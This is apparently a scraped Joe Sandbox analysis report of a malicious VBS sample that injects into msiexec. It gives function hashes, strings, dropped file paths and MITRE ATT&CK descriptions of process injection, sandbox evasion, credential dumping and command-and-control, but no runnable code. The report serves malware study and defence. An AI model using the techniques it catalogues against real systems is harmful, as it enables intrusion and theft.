Instruction Fuzzy Hash: E081DE70F07269CAEF06CF68C890BFEBBE2AF45350F14415AD869A7691C7309941CB60

Function 243DBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Resource at %p, xrefs: 24417B8E
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 24417B7F
RTL: Re-Waiting, xrefs: 24417BAC

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: a76272f7a9a31345df43932b903859aae6f2f940e75a5a6aa726a469af3e68c1
Instruction ID: 76af82a87fc6181224c078abe6e619a8f6ca146047c70886b1129022f0aeeadb
Opcode Fuzzy Hash: a76272f7a9a31345df43932b903859aae6f2f940e75a5a6aa726a469af3e68c1
Instruction Fuzzy Hash: DA41F333701B029FDB14CE25D840F9AB7E9EF88720F100A2DF95A9B781DB31E9058B91

Function 243DB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 2441728C

Strings

RTL: Resource at %p, xrefs: 244172A3
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 24417294
RTL: Re-Waiting, xrefs: 244172C1

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: bb854654e2d434155e7ce31d6ff1ee8c2eda456c4b3c628ba5c0bb88d100346f
Instruction ID: bb75bcd9539ae6f68aedefcf9206ed6c7749170eaa601665afe81ff45055a154
Opcode Fuzzy Hash: bb854654e2d434155e7ce31d6ff1ee8c2eda456c4b3c628ba5c0bb88d100346f
Instruction Fuzzy Hash: 4F41D332700A06AFDB11CE25CC41F96FBA5FF55B10F200619FA59AB341DB31E8568BD1

Function 243E7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 243E7E8B

Strings

-, xrefs: 243E7DDD
+, xrefs: 243E7DE8

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: a27641cba29ac4cc1bb6ccfd10256b6eac56b5dc3111187bdc262c981fc37380
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: D591A770F02A269BDB14CF69C881ABEBBA5FF84760F10451AEA5DE72C5D730DD428760

Function 243A9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

@, xrefs: 243A9175
$, xrefs: 243A9191

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 063ca8add4055bc3e2bb28c3b32cdc11518006a5bc15cf1ee473acd97cb6f6da
Instruction ID: b21483bc3025b45ff828fe2ecab59094fdcc9624b323ea279043f20563a8debb
Opcode Fuzzy Hash: 063ca8add4055bc3e2bb28c3b32cdc11518006a5bc15cf1ee473acd97cb6f6da
Instruction Fuzzy Hash: 9A811C71D012699BDB25CB54CC44BEEB7B8BF58750F0045EAEA19B7280D7309E85CFA0

Function 2442CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON

Download Yara Rule

APIs

@_EH4_CallFilterFunc@8.LIBCMT ref: 2442CFBD

Strings

@, xrefs: 2442CF0A
@4_w@4_w, xrefs: 2442CFD5, 2442CFDA, 2442CFF1

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID: CallFilterFunc@8
String ID: @$@4_w@4_w
API String ID: 4062629308-713214301
Opcode ID: 4e97163410371ce6b803e5ed0f54e7eb1cfe5b180c3eeb88e474a2ec21fc4dcd
Instruction ID: 3dbc588f833ce895891d6e7d72225bd8654aff1653f811d200792f8726badc38
Opcode Fuzzy Hash: 4e97163410371ce6b803e5ed0f54e7eb1cfe5b180c3eeb88e474a2ec21fc4dcd
Instruction Fuzzy Hash: 3D419FB1900624DFDF21CF95C840AAABBF8FF55B48F01416AEA05EB368D774D901DB61

Analysis Process: zGmdnmqGCKDq.exePID: 6240, Parent PID: 7460COMMON

Execution Graph

Execution Coverage:	2.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 00C81A61 Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

closesocket.WS2_32(?), ref: 00C81A96

Memory Dump Source

Source File: 0000000E.00000002.2647710353.0000000000BF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_bf0000_zGmdnmqGCKDq.jbxd

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 4dc1a8c91fda9065efd91367fb656d7b4791c97181778a1447ffd4caeb2fd572
Instruction ID: 9a61722bff3ebd1b540a79f4f888c6d9d736bf46d52cbbd8883b063d308810ef
Opcode Fuzzy Hash: 4dc1a8c91fda9065efd91367fb656d7b4791c97181778a1447ffd4caeb2fd572
Instruction Fuzzy Hash: 98E0463A200604BBC610EAA9DC81D9B77ACDBD6752F008559FE09A7241DA31BA2587B1

Non-executed Functions

Function 00C61EC1 Relevance: 26.5, Strings: 21, Instructions: 281COMMON

Download Yara Rule

Strings

'O, xrefs: 00C620C2
#I, xrefs: 00C622D6
NK, xrefs: 00C61FC4
yB, xrefs: 00C62055
Um, xrefs: 00C620E0
f, xrefs: 00C61EE6
G, xrefs: 00C6207B
z", xrefs: 00C6223F
o}, xrefs: 00C61EFB
>t, xrefs: 00C620A4
(e, xrefs: 00C61FF3
R=, xrefs: 00C61FD8
?, xrefs: 00C61F42
\, xrefs: 00C61F74
W#, xrefs: 00C61FB0
5, xrefs: 00C61F0B
u, xrefs: 00C61EDF
:, xrefs: 00C61F7E
2Z, xrefs: 00C620D6
9, xrefs: 00C61F56
|, xrefs: 00C62040

Memory Dump Source

Source File: 0000000E.00000002.2647710353.0000000000BF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_bf0000_zGmdnmqGCKDq.jbxd

Similarity

API ID:
String ID: #I$'O$(e$2Z$9$>t$?$G$NK$R=$Um$W#$\$f$o}$u$yB$z"$5$:$|
API String ID: 0-534497107
Opcode ID: c730068e496b32e39df4cc936d5091b54443880d6a7385e2203954b7d3a50ed8
Instruction ID: c1f7c824fe4cdc73e43758f4448dba2af5ccb17502b4bfd7252a38c4c4b13720
Opcode Fuzzy Hash: c730068e496b32e39df4cc936d5091b54443880d6a7385e2203954b7d3a50ed8
Instruction Fuzzy Hash: E9E1D0B0D05629CBEB24CF95C894BEDBBB2BB40308F208199C5097B381D7B95A89DF55

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 10145202485.vbs

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Other

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\02-E8420l

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dkirsfa5.ldc.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ihwfgtvw.nk2.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jn1shjv2.gkx.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_osp0qj4v.ppw.psm1

C:\Users\user\AppData\Roaming\Stderes.Ide

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

Windows Analysis Report
10145202485.vbs

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre